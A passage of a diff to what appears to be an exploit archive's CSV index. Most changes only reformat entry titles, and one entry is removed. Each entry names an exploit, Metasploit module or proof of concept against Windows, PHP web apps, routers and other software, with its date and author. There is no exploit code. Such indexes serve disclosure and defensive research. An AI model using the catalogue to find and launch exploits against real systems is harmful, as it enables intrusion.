Free",2010-12-14,metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16593,platforms/windows/local/16593.rb,"Adobe JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 +16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 @@ -14397,7 +14392,7 @@ id,file,description,date,author,platform,type,port 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0 16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-09-25,metasploit,windows,local,0 -16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record Vulnerability",2010-09-25,metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 @@ -14445,7 +14440,7 @@ id,file,description,date,author,platform,type,port 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,metasploit,windows,local,0 16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,metasploit,windows,local,0 -16672,platforms/windows/local/16672.rb,"Adobe JBIG2Decode Memory Corruption Exploit",2010-09-25,metasploit,windows,local,0 +16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,metasploit,windows,local,0 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,metasploit,windows,local,0 @@ -14457,7 +14452,7 @@ id,file,description,date,author,platform,type,port 16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-09-25,metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,metasploit,windows,local,0 16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 -16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 PLS M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0 +16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player ""newfunction"" Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 @@ -14988,7 +14983,7 @@ id,file,description,date,author,platform,type,port 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 -17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit(SEH)",2011-05-11,h1ch4m,windows,local,0 +17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day",2011-05-12,"Stefan LE BERRE",windows,dos,0 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 DEP Bypass",2011-05-12,h1ch4m,windows,local,0 @@ -16159,7 +16154,7 @@ id,file,description,date,author,platform,type,port 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,metasploit,windows,remote,0 -18715,platforms/multiple/webapps/18715.rb,"Liferay XSL Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 +18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal vulnerability",2012-04-08,modpr0be,windows,remote,0 @@ -16689,7 +16684,7 @@ id,file,description,date,author,platform,type,port 19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0 -19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 +19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 19340,platforms/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos,0 19341,platforms/solaris/local/19341.c,"Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (1)",1998-12-24,"Cheez Whiz",solaris,local,0 19342,platforms/solaris/local/19342.c,"Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (2)",1998-12-24,UNYUN,solaris,local,0 @@ -17625,8 +17620,8 @@ id,file,description,date,author,platform,type,port 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software ""?/"" HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 -20324,platforms/windows/remote/20324.txt,"iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 -20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 +20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 +20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 @@ -17716,7 +17711,7 @@ id,file,description,date,author,platform,type,port 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal AFS Buffer Overflow Vulnerability",2000-11-18,mat,unix,remote,0 20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin <= 2.1 - SQL Injection Vulnerability",2012-08-10,StRoNiX,php,webapps,0 -20417,platforms/osx/local/20417.c,"Tunnelblick Local Root Exploit",2012-08-11,zx2c4,osx,local,0 +20417,platforms/osx/local/20417.c,"Tunnelblick - Local Root Exploit",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 - CMS Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 @@ -17741,7 +17736,7 @@ id,file,description,date,author,platform,type,port 20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 Path Disclosure Vulnerability",2000-11-29,"Chad Kalmes",multiple,remote,0 20442,platforms/cgi/remote/20442.html,"Greg Matthews Classifieds.cgi 1.0 Hidden Variable Vulnerability",1998-12-15,anonymous,cgi,remote,0 -20443,platforms/osx/local/20443.sh,"Tunnelblick Local Root Exploit #2",2012-08-11,zx2c4,osx,local,0 +20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews Classifieds.cgi 1.0 Metacharacter Vulnerability",1998-12-15,anonymous,cgi,remote,0 20445,platforms/windows/remote/20445.txt,"IIS 1.0,Netscape Server 1.0/1.12,OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 @@ -20227,7 +20222,7 @@ id,file,description,date,author,platform,type,port 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0 -23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0 +23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0 23020,platforms/php/webapps/23020.txt,"HostAdmin 0 Path Disclosure Vulnerability",2003-08-12,G00db0y,php,webapps,0 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 Search Cross-Site Scripting Vulnerability",2003-08-12,"Donnie Werner",cgi,webapps,0 23022,platforms/php/local/23022.c,"PHP 4.x DLOpen Memory Disclosure Vulnerability (1)",2003-08-13,"Andrew Griffiths",php,local,0 @@ -20751,7 +20746,7 @@ id,file,description,date,author,platform,type,port 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability",2004-01-20,"Oliver Karow",windows,remote,0 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 -23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 +23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 Cross-Site Scripting Vulnerability",2004-01-21,"Donato Ferrante",multiple,remote,0 23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 @@ -20879,7 +20874,7 @@ id,file,description,date,author,platform,type,port 23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability",2004-02-13,anonymous,windows,remote,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 -23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 +23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0 @@ -22345,7 +22340,7 @@ id,file,description,date,author,platform,type,port 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection Vulnerability",2005-03-18,"GHC team",php,webapps,0 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 Database Configuration Information Disclosure Vulnerability",2005-03-18,"Majid NT",php,webapps,0 -25238,platforms/multiple/remote/25238.txt,"Icecast 2.x XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote,0 +25238,platforms/multiple/remote/25238.txt,"Icecast 2.x - XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote,0 25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 avatar.php img Parameter XSS",2005-03-19,Romano,php,webapps,0 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.PHP HTML Injection Vulnerability",2005-03-19,"PersianHacker Team",php,webapps,0 @@ -22871,7 +22866,6 @@ id,file,description,date,author,platform,type,port 25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 -25776,platforms/windows/local/25776.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-28,metasploit,windows,local,0 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2005-05-31,"Alberto Trivero",php,webapps,0 @@ -24270,7 +24264,7 @@ id,file,description,date,author,platform,type,port 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHPNuke 6.x/7.x Header.PHP Pagetitle Parameter Cross-Site Scripting Vulnerability",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 Cross-Site Scripting Vulnerability",2006-02-13,"Micha Borrmann",php,webapps,0 -27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 +27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption Vulnerability",2006-02-14,"Evgeny Legerov",multiple,dos,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 Search.PHP Cross-Site Scripting Vulnerability",2006-02-14,Citynova,php,webapps,0 @@ -24656,7 +24650,7 @@ id,file,description,date,author,platform,type,port 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,metasploit,windows,remote,8000 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD Stack Buffer Overflow",2013-08-15,metasploit,windows,remote,80 -27609,platforms/windows/local/27609.rb,"Chasys Draw IES Buffer Overflow",2013-08-15,metasploit,windows,local,0 +27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,metasploit,windows,local,0 27610,platforms/php/remote/27610.rb,"Joomla Media Manager File Upload Vulnerability",2013-08-15,metasploit,php,remote,80 27611,platforms/windows/remote/27611.txt,"Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 @@ -26832,8 +26826,8 @@ id,file,description,date,author,platform,type,port 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability",2007-04-24,suresync,windows,remote,0 29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal vulnerability",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0 -29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 -29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 +29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 +29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.PHP Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0 29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.PHP Multiple Remote File Include Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 @@ -27774,7 +27768,7 @@ id,file,description,date,author,platform,type,port 30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 -30956,platforms/linux/dos/30956.txt,"CoolPlayer 217 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 +30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0 30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0 30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0 @@ -27829,7 +27823,7 @@ id,file,description,date,author,platform,type,port 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 'view_func.php' Remote File Include Vulnerability",2008-01-11,ShipNX,php,webapps,0 -31013,platforms/hardware/remote/31013.txt,"2Wire Routers Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0 +31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 @@ -27892,7 +27886,7 @@ id,file,description,date,author,platform,type,port 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0 31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 -31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0 +31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' - Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0 31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0 @@ -29263,8 +29257,8 @@ id,file,description,date,author,platform,type,port 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 -32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 -32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 @@ -29751,7 +29745,7 @@ id,file,description,date,author,platform,type,port 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 -33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 +33027,platforms/windows/remote/33027.py,"Kolibri 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0 33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0 @@ -29862,7 +29856,7 @@ id,file,description,date,author,platform,type,port 33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 